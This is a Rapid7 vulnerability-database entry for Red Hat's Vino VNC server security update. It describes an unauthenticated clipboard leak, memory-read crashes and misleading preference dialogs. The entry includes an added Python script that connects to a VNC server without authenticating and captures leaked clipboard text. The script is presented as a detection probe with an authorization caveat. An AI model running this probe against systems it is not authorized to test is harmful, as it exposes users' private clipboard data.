Rapid7 Vulnerability & Exploit Database

RHSA-2013:0169: vino security update



Severity: 5
CVSS: (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Published: 09/30/2012
Created: 07/25/2018
Added: 01/29/2013
Modified: 07/04/2017

Description

Vino is a Virtual Network Computing (VNC) server for GNOME. It allows remote users to connect to a running GNOME session using VNC.

It was found that Vino transmitted all clipboard activity on the system running Vino to all clients connected to port 5900, even those who had not authenticated. A remote attacker who is able to access port 5900 on a system running Vino could use this flaw to read clipboard data without authenticating. (CVE-2012-4429)

Two out-of-bounds memory read flaws were found in the way Vino processed client framebuffer requests in certain encodings. An authenticated client could use these flaws to send a specially-crafted request to Vino, causing it to crash. (CVE-2011-0904, CVE-2011-0905)

In certain circumstances, the vino-preferences dialog box incorrectly indicated that Vino was only accessible from the local network. This could confuse a user into believing connections from external networks are not allowed (even when they are allowed). With this update, vino-preferences no longer displays connectivity and reachable information. (CVE-2011-1164)

There was no warning that Universal Plug and Play (UPnP) was used to open ports on a user's network router when the "Configure network automatically to accept connections" option was enabled (it is disabled by default) in the Vino preferences. This update changes the option's description to avoid the risk of a UPnP router configuration change without the user's consent. (CVE-2011-1165)

All Vino users should upgrade to this updated package, which contains backported patches to resolve these issues. The GNOME session must be restarted (log out, then log back in) for this update to take effect.
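The clipboard leak (CVE-2012-4429) is observable from the client side: RFB carries clipboard updates as ServerCutText messages (type 3, three padding bytes, a big-endian 32-bit length, then Latin-1 text, per RFC 6143 section 7.6.4), which a correct server only sends after the security handshake has completed. The script below is an added example, not Rapid7's or Red Hat's code. The message parser is exact; the assumption that the leak appears on the wire as ordinary ServerCutText messages interleaved with the handshake bytes of an unauthenticated connection is ours, taken from the advisory text above, as are the helper names and the constructed sample stream. Use the probe only against systems you are authorized to test.

```python
"""Detect RFB ServerCutText (clipboard) messages sent to an unauthenticated
VNC client.  Added example; not code from the advisory or from Vino itself.
Message layout is from RFC 6143 section 7.6.4.  The sample stream below is
constructed for illustration."""
import socket
import struct
import sys

SERVER_CUT_TEXT = 3  # RFB server-to-client message type for clipboard updates


def build_server_cut_text(text: str) -> bytes:
    """Encode `text` as a ServerCutText message: u8 type, 3 pad bytes, u32 length."""
    body = text.encode("latin-1")
    return struct.pack(">B3xI", SERVER_CUT_TEXT, len(body)) + body


def find_server_cut_text(data: bytes) -> list:
    """Return every clipboard string in `data` that is laid out as a ServerCutText
    message.  The scan is heuristic on purpose: it is meant for the raw
    pre-authentication byte stream, where the version string and security-type
    list are interleaved with anything the server leaks, so a candidate is only
    accepted when its padding bytes are zero and its length fits in the buffer."""
    found = []
    i = 0
    while i + 8 <= len(data):
        if data[i] == SERVER_CUT_TEXT and data[i + 1:i + 4] == b"\x00\x00\x00":
            (length,) = struct.unpack(">I", data[i + 4:i + 8])
            if length <= len(data) - (i + 8):
                found.append(data[i + 8:i + 8 + length].decode("latin-1"))
                i += 8 + length
                continue
        i += 1
    return found


def probe_clipboard_leak(host: str, port: int = 5900, wait: float = 5.0) -> list:
    """Connect, echo the server's protocol version so it keeps the connection
    open, then read for `wait` seconds without ever authenticating and scan what
    arrived.  A non-empty result means clipboard contents reached a client that
    never authenticated, which is the behaviour CVE-2012-4429 describes.
    (Assumption: the leaked data is an ordinary ServerCutText message.)"""
    with socket.create_connection((host, port), timeout=wait) as sock:
        version = sock.recv(12)  # e.g. b"RFB 003.008\n"
        if not version.startswith(b"RFB "):
            raise ValueError("not an RFB server: %r" % version)
        sock.sendall(version)  # answer the version; do not pick a security type
        sock.settimeout(wait)
        chunks = []
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return find_server_cut_text(b"".join(chunks))


# Constructed sample: version banner, a 2-entry security-type list (None, VNC auth),
# then two clipboard messages that a vulnerable server would push to this client.
SAMPLE_STREAM = (
    b"RFB 003.008\n"
    + b"\x02\x01\x02"
    + build_server_cut_text("s3cret-paste")
    + build_server_cut_text("second paste")
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        leaked = probe_clipboard_leak(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 5900)
    else:
        leaked = find_server_cut_text(SAMPLE_STREAM)
    for text in leaked:
        print("clipboard received before authentication: %r" % text)
    print("vulnerable" if leaked else "no clipboard data observed")
```

Run it with a host (and optional port) to probe a live server; with no arguments it scans the constructed sample and reports both pasted strings. A fixed Vino sends nothing but the security-type list to a client that has not authenticated, so the probe should return an empty list there; copy something to the clipboard on the target desktop while the probe is waiting, since the advisory describes the leak as triggered by clipboard activity.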

Solution(s)

  • redhat-upgrade-vino
  • redhat-upgrade-vino-debuginfo
